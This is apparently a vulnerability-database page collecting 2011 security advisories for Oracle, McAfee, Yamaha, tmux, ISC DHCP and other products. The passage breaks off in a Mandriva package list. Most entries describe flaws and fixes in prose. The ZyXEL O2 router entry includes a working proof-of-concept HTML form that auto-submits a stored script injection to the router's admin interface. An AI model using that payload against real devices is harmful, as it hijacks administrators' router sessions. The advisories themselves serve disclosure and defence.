VARIoT IoT vulnerabilities database

Oracle has released advance notification regarding the April 2011 Critical Patch Update (CPU) to be released on April 19, 2011. The update addresses 73 vulnerabilities affecting the following software: Oracle Database Oracle Fusion Middleware Oracle Application Server Oracle Identity Management Oracle JRockit Oracle Outside In Technology Oracle WebLogic Server Oracle E-Business Suite Oracle Agile Technology Platform Oracle PeopleSoft Enterprise CRM Oracle PeopleSoft Enterprise ELS Oracle PeopleSoft Enterprise HRMS Oracle PeopleSoft Enterprise Portal Oracle PeopleSoft Enterprise People Tools Oracle JD Edwards OneWorld Tools Oracle JD Edwards EnterpriseOne Tools Oracle Siebel CRM Core Oracle InForm Oracle Sun Product Suite Oracle Open Office StarOffice/StarSuite Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. This BID is being retired. The following individual records exist to better document the issues: 46031 OpenOffice Multiple Remote Code Execution Vulnerabilities 46091 Oracle Java Floating-Point Value Denial of Service Vulnerability 46387 Oracle Java SE and Java for Business CVE-2010-4470 Remote Java Runtime Environment Vulnerability 46388 Oracle Java 'Applet2ClassLoader' Class Unsigned Applet Remote Code Execution Vulnerability 46391 Oracle Java SE and Java for Business Java Runtime Environment CVE-2010-4454 Remote Vulnerability 46393 Oracle Java SE and Java for Business CVE-2010-4468 Remote Java Runtime Environment Vulnerability 46394 Oracle Java SE and Java for Business Remote Code Execution Vulnerability 46395 Oracle Java SE and Java for Business CVE-2010-4467 Remote Java Runtime Environment Vulnerability 46397 Oracle Java SE and Java for Business CVE-2010-4450 Remote Java Runtime Environment Vulnerability 46398 Oracle Java SE and Java for Business CVE-2010-4448 Remote Java Runtime Environment Vulnerability 46399 Oracle Java SE and Java for Business CVE-2010-4471 Remote Security Vulnerability 46403 Oracle Java SE and Java for Business CVE-2010-4473 Remote Java Runtime Environment Vulnerability 46404 Oracle Java SE and Java for Business CVE-2010-4472 Remote Java Runtime Environment Vulnerability 46406 Oracle Java Applet Clipboard Injection Remote Code Execution Vulnerability 46767 Multiple Vendors STARTTLS Implementation Plaintext Arbitrary Command Injection Vulnerability 47171 Oracle Solaris CVE-2011-0412 Password Hash Local Information Disclosure Weakness 47429 Oracle Database Server CVE-2011-0792 Remote Oracle Warehouse Builder Vulnerability 47430 Oracle Database CVE-2011-0806 Network Foundation Remote Vulnerability 47431 Oracle Database Server CVE-2011-0799 Remote Warehouse Builder Vulnerability 47432 Oracle Database Server CVE-2011-0804 Remote Database Vault Vulnerability 47434 Oracle E-Business Suite CVE-2011-0809 Web ADI Remote Vulnerability 47435 Oracle Outside In Technology Lotus 123 File Parsing Remote Code Execution Vulnerability 47436 Oracle Database Server CVE-2011-0793 Remote Database Vault Vulnerability 47437 Oracle Outside In Technology Microsoft CAB File Parsing Remote Code Execution Vulnerability 47438 Oracle Sun GlassFish/Java System Application Server Remote Authentication Bypass Vulnerability 47439 Oracle PeopleSoft Enterprise HRMS CVE-2011-0853 Remote PeopleSoft Enterprise HRMS Vulnerability 47440 Oracle E-Business Suite CVE-2011-0797 Applications Install Remote Vulnerability 47441 Oracle Database Server CVE-2011-0805 Remote UIX Vulnerability 47442 Oracle PeopleSoft Enterprise HRMS CVE-2011-0854 Remote PeopleSoft Enterprise HRMS Vulnerability 47443 Oracle Database Server CVE-2011-0785 Remote Oracle Help Vulnerability 47444 Oracle Sun Solaris 11 Express CVE-2011-0841 Remote Vulnerability 47445 Oracle PeopleSoft Enterprise HRMS CVE-2011-0858 Remote Talent Acquisition Manager Vulnerability 47446 Oracle E-Business Suite CVE-2011-0791 Remote Application Object Library Vulnerability 47448 Oracle PeopleSoft Enterprise HRMS CVE-2011-0857 Remote PeopleSoft Enterprise HRMS Vulnerability 47449 Oracle E-Business Suite CVE-2011-0796 Applications Install Local Vulnerability 47450 Oracle Sun Solaris CVE-2011-0800 Local Vulnerability 47451 Oracle Enterprise Manager Grid Control CVE-2011-0787 Remote Security Vulnerability 47452 Oracle JD Edwards EnterpriseOne Tools CVE-2011-0825 Remote Vulnerability 47453 Oracle PeopleSoft Enterprise HRMS CVE-2011-0859 Remote Global Payroll North America Vulnerability 47454 Oracle Supply Chain Product CVE-2011-0837 Remote Agile Technology Platform Vulnerability 47455 Oracle JD Edwards EnterpriseOne Tools CVE-2011-0824 Remote Vulnerabilty 47456 Oracle Peoplesoft Enterprise CVE-2011-0826 Remote Vulnerability 47459 Oracle PeopleSoft Enterprise HRMS CVE-2011-0860 Remote Global Payroll Spain Vulnerability 47460 Oracle PeopleSoft Enterprise CRM CVE-2011-0850 Remote Vulnerability 47461 Oracle JD Edwards EnterpriseOne Tools CVE-2011-0803 Remote Vulnerability 47462 Oracle PeopleSoft CVE-2011-0828 Remote PeopleSoft Enterprise Vulnerability 47463 Oracle Portal CVE-2011-0798 Remote Security Vulnerability 47464 Oracle JD Edwards OneWorld Tools CVE-2011-0818 Remote Vulnerability 47465 Oracle PeopleSoft Enterprise CVE-2011-0827 Remote Vulnerability 47466 Oracle JD Edwards EnterpriseOne Tools CVE-2011-0819 Remote Vulnerability 47467 Oracle PeopleSoft Enterprise ELS CVE-2011-0851 Remote Vulnerability 47468 Oracle JD Edwards OneWorld Tools CVE-2011-0823 Remote Vulnerability 47469 Oracle JD Edwards EnterpriseOne Tools CVE-2011-0810 Remote Vulnerability 47470 Oracle PeopleSoft CVE-2011-0861 Remote PeopleSoft Enterprise HRMS Vulnerability 47471 Oracle PeopleSoft CVE-2011-0840 Remote PeopleSoft Enterprise PeopleTools Vulnerability 47472 Oracle Peoplesoft Enterprise CVE-2011-0856 Remote Vulnerability 47473 Oracle InForm CVE-2011-0855 Remote Vulnerability 47475 Oracle Application Server CVE-2011-0795 Remote Security Vulnerability 47476 Oracle Sun Solaris CVE-2011-0829 Local Vulnerability 47477 Oracle Solaris CVE-2011-0812 Local Solaris Vulnerability 47478 Oracle Solaris CVE-2011-0839 Local Solaris Vulnerability 47479 Oracle Oracle JD Edwards EnterpriseOne and OneWorld Tools CVE-2011-0836 Remote Vulnerability 47480 Oracle Solaris CVE-2011-0820 Remote Kernel Vulnerability 47481 Oracle OpenSSO & Java System Access Manager CVE-2011-0847 Remote Vulnerability 47483 Oracle Java Dynamic Management Kit CVE-2011-0849 Remote Vulnerability 47484 Oracle Siebel CVE-2011-0833 Remote Siebel CRM Core Vulnerability 47486 Oracle Siebel CVE-2011-0834 Remote Siebel CRM Core Vulnerability 47487 Oracle Java System Access Manager Policy Agent CVE-2011-0846 Remote Web Proxy Agent Vulnerability 47488 Oracle Siebel CVE-2011-0843 Remote Siebel CRM Core Vulnerability 47489 Oracle Application Server CVE-2011-0789 Remote Security Vulnerability 47490 Oracle OpenSSO & Java System Access Manager CVE-2011-0844 Remote Vulnerability 47491 Oracle Solaris CVE-2011-0801 Local Vulnerability 47492 Oracle Solaris CVE-2011-0813 Local Kernel Vulnerability 47493 Oracle Sun Solaris CVE-2011-0821 Local Vulnerability 47494 Oracle Solaris CVE-2011-0790 Local Vulnerability

Tor before 0.2.2.24-alpha continues to use a reachable bridge that was previously configured but is not currently configured, which might allow remote attackers to obtain sensitive information about clients in opportunistic circumstances by monitoring network traffic to the bridge port. Tor is prone to an information disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information to launch further attacks. Versions prior to Tor 0.2.2.24 are vulnerable

The web interface in McAfee Firewall Reporter before 5.1.0.13 does not properly implement cookie authentication, which allows remote attackers to obtain access, and disable anti-virus functionality, via an HTTP request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the code responsible for authenticating users. The GernalUtilities.pm file contains code to validate sessions by parsing cookie values without sanitization. The faulty logic simply checks for the existence of a particular file, without verifying its contents. By using a directory traversal technique an attacker can point the cgisess cookie value to an arbitrary file that exists on the server and thus bypass authentication. This issue may allow websites to bypass certain security restrictions and gain access to potentially sensitive information. This issue was introduced in McAfee Firewall Reporter 5.1.0.6. ZDI-11-117: McAfee Firewall Reporter GeneralUtilities.pm isValidClient Authentication Bypass Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-117 April 11, 2011 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: McAfee -- Affected Products: McAfee Firewall Reporter -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10522. -- Vendor Response: McAfee states: Fixed February 9, 2011 Bulletin modified April 11, 2011: https://kc.mcafee.com/corporate/index?page=content&id=SB10015 -- Disclosure Timeline: 2010-09-22 - Vulnerability reported to vendor 2011-04-11 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi . ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: McAfee Firewall Reporter Web Interface Security Bypass Vulnerability SECUNIA ADVISORY ID: SA44110 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44110/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44110 RELEASE DATE: 2011-04-14 DISCUSS ADVISORY: http://secunia.com/advisories/44110/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44110/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44110 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in McAfee Firewall Reporter, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is reported in version 5.1.0.6. SOLUTION: Update to version 5.1.0.13. PROVIDED AND/OR DISCOVERED BY: Andrea Micalizzi (rgod) via ZDI ORIGINAL ADVISORY: McAfee: https://kc.mcafee.com/corporate/index?page=content&id=SB10015 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-117/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Yamaha RTX, RT, SRT, RTV, RTW, and RTA series routers with firmware 6.x through 10.x, and NEC IP38X series routers with firmware 6.x through 10.x, do not properly handle IP header options, which allows remote attackers to cause a denial of service (device reboot) via a crafted option that triggers access to an invalid memory location. Multiple routers provided by Yamaha contain a denial-of-service vulnerability. Multiple routers provided by Yamaha contain a denial-of-service (DoS) vulnerability due to an issue in processing IP packets. Yuji Ukai of Fourteenforty Research Institute, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.A remote attacker may cause a denial-of-service (DoS). The Yamaha RT Series Router is a high speed broadband router device. A security vulnerability exists in the Yamaha RT series router when parsing IP packets, allowing an attacker to perform a denial of service attack on the device. Successful exploits will cause the device to crash, denying service to legitimate users. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: Yamaha RT Series Routers IP Header Parsing Denial of Service Vulnerability SECUNIA ADVISORY ID: SA44087 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44087/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44087 RELEASE DATE: 2011-04-12 DISCUSS ADVISORY: http://secunia.com/advisories/44087/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44087/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44087 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in the Yamaha RT Series Routers, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when parsing certain IP header options and can be exploited to cause a device to reboot via a specially crafted packet. Please see the vendor's advisory for the list of affected products and versions. SOLUTION: Update to a fixed firmware version if available or restrict access to trusted hosts only. Please see the vendor's advisory for more details. ORIGINAL ADVISORY: Yamaha: http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/JVN55714408.html JVN: http://jvn.jp/en/jp/JVN55714408/index.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

pure-ftpd 1.0.22, as used in SUSE Linux Enterprise Server 10 SP3 and SP4, and Enterprise Desktop 10 SP3 and SP4, when running OES Netware extensions, creates a world-writeable directory, which allows local users to overwrite arbitrary files and gain privileges via unspecified vectors. Pure-FTPd in SUSE is prone to a local insecure-file-permissions vulnerability. A local attacker can exploit this issue to overwrite certain files. This may lead to privilege escalation; other attacks may also be possible. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: SUSE pure-ftpd Privilege Escalation Vulnerability SECUNIA ADVISORY ID: SA44039 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44039/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44039 RELEASE DATE: 2011-04-08 DISCUSS ADVISORY: http://secunia.com/advisories/44039/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44039/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44039 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: SUSE has acknowledged a vulnerability in the pure-ftpd package for SUSE Linux Enterprise Server, which can be exploited by malicious, local users to gain escalated privileges. The vulnerability is caused due to an error related to a world-writable folder created by the "OES pure-ftpd Netware extensions", which can be exploited to manipulate system files and gain escalated privileges. Further information is currently not available. SOLUTION: Apply updated packages via the zypper package manager. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: SUSE-SU-2011:0306-1: https://hermes.opensuse.org/messages/7849430 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.

Cross-site scripting (XSS) vulnerability in Cyber-Ark Password Vault Web Access (PVWA) 5.0 and earlier, 5.5 through 5.5 patch 4, and 6.0 through 6.0 patch 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Password Vault Web Access (PVWA) provided by Cyber-Ark Software, Ltd. contains a cross-site scripting vulnerability. Password Vault Web Access (PVWA) is a module in the Privileged Identity Management Suite that allows access via a web portal. PVWA contains a cross-site scripting vulnerability.An arbitrary script may be executed on the web browser of an user who is logged on. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: Cyber-Ark PIM Suite Password Vault Web Access Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA44058 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44058/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44058 RELEASE DATE: 2011-04-09 DISCUSS ADVISORY: http://secunia.com/advisories/44058/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44058/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44058 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Cyber-Ark PIM Suite, which can be exploited by malicious people to conduct cross-site scripting attacks. Please contact the vendor for more information. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: JVN: http://jvn.jp/en/jp/JVN11424086/index.html http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000023.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Fiberhome HG-110 is an ADSL router device. The Fiberhome HG-110 has a cross-site scripting attack that can lead to the disclosure of sensitive information or unauthorized access to system sensitive files. Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks. Fiberhome HG-110 firmware 1.0.0 is vulnerable other versions may also be affected

tmux 1.3 and 1.4 does not properly drop group privileges, which allows local users to gain utmp group privileges via a filename to the -S command-line option. Local attackers may exploit this issue to gain elevated privileges; other attacks may also be possible. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2212-1 security@debian.org http://www.debian.org/security/ Nico Golde April 7, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : tmux Vulnerability : privilege escalation Problem type : local Debian-specific: yes CVE ID : CVE-2011-1496 Debian bug : 620304 Daniel Danner discovered that tmux, a terminal multiplexer, is not properly dropping group privileges. The oldstable distribution (lenny) is not affected by this problem, it does not include tmux. For the stable distribution (squeeze), this problem has been fixed in version 1.3-2+squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 1.4-6. For the testing distribution (sid), this problem has been fixed in version 1.4-6. We recommend that you upgrade your tmux packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk2eFbcACgkQHYflSXNkfP/NsgCfcy8X81nTclGCQSWTXxX1/wDF o3kAnR7KmINuzH+MnbAls9Vf8Ewib/Bc =jUL0 -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: Debian update for tmux SECUNIA ADVISORY ID: SA44081 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44081/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44081 RELEASE DATE: 2011-04-09 DISCUSS ADVISORY: http://secunia.com/advisories/44081/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44081/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44081 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Debian has issued an update for tmux. The security issue is caused due to the application not dropping group privileges and can be exploited to perform certain actions using permissions of the "tmux" group. SOLUTION: Apply updated packages via the apt-get package manager. PROVIDED AND/OR DISCOVERED BY: Reported by Daniel Danner in a Debian bug report. ORIGINAL ADVISORY: DSA-2212-1: http://www.debian.org/security/2011/dsa-2212 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site request forgery (CSRF) vulnerability in Forms/PortForwarding_Edit_1 on the ZyXEL O2 DSL Router Classic allows remote attackers to hijack the authentication of administrators for requests that insert cross-site scripting (XSS) sequences via the PortRule_Name parameter. The device is produced by ZyXEL, it seems it has no other name than the brand "O2 DSL Router Classic". As an example, the form at /Forms/PortForwarding_Edit_1 accepts javascript code for the parameter PortRule_Name, which will be permanently stored. Also, the form has no protection against CSRF. A sample code that will inject permanent javascript when called by a user who is logged into his router: <form id="form1" method="post" action="http://192.168.1.1/Forms/PortForwarding_Edit_1"> <input name="PortRule_Name" value='"><script>alert(7)</script>'> <input name="PortRule_SPort" value="77"> <input name="PortRule_EPort" value="77"> <input name="PortRule_SrvAddr" value="10.0.0.1" > <script> var frm = document.getElementById("form1"); frm.submit(); </script> This is just an example, all forms in the router interface are vulnerable to CSRF and, if they accept text input, to XSS. The vulnerability has been disclosed to O2 in advance without any reply. Disclosure Timeline 2011-02-03: Vendor contacted 2011-04-07: Published advisory This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de, of schokokeks.org webhosting

The O2 DSL Router Classic is a router. O2 DSL Router Classic has a cross-site request forgery vulnerability. An attacker could exploit the vulnerability to execute arbitrary instructions in the context of a user session. This may aid in other attacks. Other attacks are also possible

vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.

dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message, as demonstrated by a hostname that is provided to dhclient-script. In addition, ISC Has released the following vulnerability information. Depending on the script and OS, this can result in execution of exploit code on the client."A remote attacker could execute arbitrary code. Apple From Apple Time Capsule and AirPort Base Station (802.11n) Firmware update for has been released.Crafted DHCP Any command may be executed by processing the response. A remote attacker can exploit this issue through a rogue DHCP server. Additionally for Corporate Server 4 and Enterprise Server 5 ISC DHCP has been upgraded from the 3.0.7 version to the 4.1.2-P1 version which brings many enhancements such as better ipv6 support. Packages for 2009.0 are provided as of the Extended Maintenance Program. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997 http://ftp.isc.org/isc/dhcp/dhcp-4.1.2-P1-RELNOTES https://www.isc.org/software/dhcp/advisories/cve-2011-0997 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: 0fe2b147ebdba8b68f69ddc27160db5c 2009.0/i586/dhcp-client-4.1.2-0.4mdv2009.0.i586.rpm f4ee7090da2bec5cb4482f2fa21beb8b 2009.0/i586/dhcp-common-4.1.2-0.4mdv2009.0.i586.rpm a4a5bd2f2d8f4d40a4c60d5dde55307c 2009.0/i586/dhcp-devel-4.1.2-0.4mdv2009.0.i586.rpm 814bc88e335fb03901f326300ae92961 2009.0/i586/dhcp-doc-4.1.2-0.4mdv2009.0.i586.rpm ec52571bb8002e9394b1eb6e6fc95b64 2009.0/i586/dhcp-relay-4.1.2-0.4mdv2009.0.i586.rpm e7fed43b5db92babf8ca3acbd7210b7f 2009.0/i586/dhcp-server-4.1.2-0.4mdv2009.0.i586.rpm 18489ac449e257f1fa9aad9e7a054b45 2009.0/SRPMS/dhcp-4.1.2-0.4mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b557459f67de2b8ec481d313d9a26cb2 2009.0/x86_64/dhcp-client-4.1.2-0.4mdv2009.0.x86_64.rpm b4ea7a9670866fff6cd3f4eb77073a84 